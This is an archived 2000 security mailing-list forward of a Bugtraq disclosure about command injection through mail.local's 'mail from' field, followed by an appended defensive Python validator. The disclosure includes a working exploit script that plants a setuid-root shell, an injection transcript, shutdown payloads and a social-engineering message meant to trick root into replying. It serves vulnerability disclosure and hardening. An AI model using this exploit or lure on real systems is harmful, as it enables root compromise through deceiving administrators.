From owner-freebsd-security Thu Nov  2 05:42:26 2000
Message-Id: <200011021341.eA2DfuZ34050@cwsys.cwsent.com>
X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1.1-RELEASE
X-Sender: cy
To: freebsd-security@freebsd.org
Subject: vulnerability in mail.local (fwd)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 02 Nov 2000 05:41:49 -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Looks like we could be vulnerable too.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message
[headers removed]
Message-ID:
Date: Wed, 1 Nov 2000 18:57:10 GMT
Reply-To: gregory duchemin
Sender: Bugtraq List
From: gregory duchemin
Subject: vulnerability in mail.local
To: BUGTRAQ@SECURITYFOCUS.COM

hi,

mail.local is a little setuid root program designed, as its name suggests, for local mail delivery. Used with the -l option, we have an interactive mode in the LMTP protocol (simplified SMTP for local mail delivery only).

A weakness exists in the 'mail from' field that allows any local user to insert a piped shell command that may be executed by the recipient when he replies with the mail command. A little social engineering skill should help to root the box.

Finally, mail.local shouldn't allow such escape chars even in the mail from field, and the mail command shouldn't allow such a reply through a pipe.

A space char in the command will finish the string, so either you use a single command like '|reboot' or use a comma that should be converted to a space by mail, e.g. '|shutdown,now'.

Linux 2.4.0 beta Caldera, which was freely distributed during DEF CON 00, is vulnerable to this problem. That looks like the old sendmail bugs nostalgia.

=======

# cat exploit
#!/bin/sh
# when run as root (e.g. by the recipient's reply), leave a setuid-root shell in /tmp
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

# id
uid=666(c3rb3r) gid=100(user)
#
# cp exploit /tmp/@hotmail.com
# chmod a+x /tmp/@hotmail.com
# mail.local -l
....
mail from:<|/tmp/@hotmail.com>

You can use many senders to hide the evil string.

rcpt to:
data
Subject: I have a problem

I need higher privilege on this machine, can you do something for me please ?
thanx.

c3rb3r

------- End of Forwarded Message

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
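The sender-field weakness described in the forwarded post, as an added example that is not part of the original post and not mail.local's own code: a small Python checker for LMTP/SMTP `MAIL FROM` lines that contrasts the lenient behaviour the post describes (anything between `<` and `>` is stored verbatim as the sender) with a hardened check that refuses pipe-prefixed reverse-paths, shell metacharacters and anything outside a conservative address alphabet. The sample command lines are constructed from the posted transcript, and the function names, the metacharacter list and the safe-character set are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed LMTP command lines modelled on the posted transcript; not a captured session.
SAMPLE_COMMANDS = [
    "MAIL FROM:<c3rb3r@localhost>",
    "MAIL FROM:<|/tmp/@hotmail.com>",   # the payload from the post
    "MAIL FROM:<|shutdown,now>",        # comma-for-space variant from the post
    "MAIL FROM:<>",                     # null reverse-path, legitimate for bounces
    "mail from:<alice@example.org>",
]

_MAIL_FROM = re.compile(r"^MAIL\s+FROM:\s*<(?P<path>[^>]*)>\s*$", re.IGNORECASE)

# Characters with meaning to /bin/sh or to the classic "|program" address form (assumed list).
SHELL_META = set("|;&`$()<>\\\"'*?[]{}!")

# Assumed conservative shape for an acceptable reverse-path: a local part made of
# address-safe characters, optionally followed by @ and a domain of the same kind.
_SAFE_PATH = re.compile(r"^[A-Za-z0-9._%+-]+(@[A-Za-z0-9.-]+)?$")


def parse_mail_from(line: str) -> str:
    """Extract the reverse-path from a MAIL FROM command; ValueError if it is not one."""
    m = _MAIL_FROM.match(line.strip())
    if not m:
        raise ValueError(f"not a MAIL FROM command: {line!r}")
    return m.group("path")


def lenient_accepts(path: str) -> bool:
    """The behaviour the post describes: whatever sits between < and > is taken as the sender."""
    return True


def strict_reject_reason(path: str) -> Optional[str]:
    """Why a hardened delivery agent should refuse this reverse-path, or None if it is acceptable."""
    if path == "":
        return None  # null reverse-path is allowed
    if path.startswith("|"):
        return "pipe-prefixed address"
    bad = sorted(SHELL_META & set(path))
    if bad:
        return "shell metacharacter(s) " + "".join(bad)
    if not _SAFE_PATH.match(path):
        return "address outside the safe character set"
    return None


@dataclass
class Verdict:
    path: str
    lenient: bool
    reason: Optional[str]  # None means the strict check accepts the path


def triage(lines: List[str]) -> List[Verdict]:
    """Run both checks over a list of MAIL FROM command lines."""
    return [
        Verdict(p, lenient_accepts(p), strict_reject_reason(p))
        for p in (parse_mail_from(line) for line in lines)
    ]


if __name__ == "__main__":
    for v in triage(SAMPLE_COMMANDS):
        status = "REJECT: " + v.reason if v.reason else "accept"
        print(f"{v.path!r:28} lenient={v.lenient!s:5} strict={status}")
```

The same predicate belongs on the reply side: a mail user agent that is about to hand a From address to the transport should refuse, or at least confirm, any address beginning with `|`, since that prefix is what turns a reply into a command execution. Rejecting at the LMTP boundary and again in the user agent closes both halves of the chain the post describes.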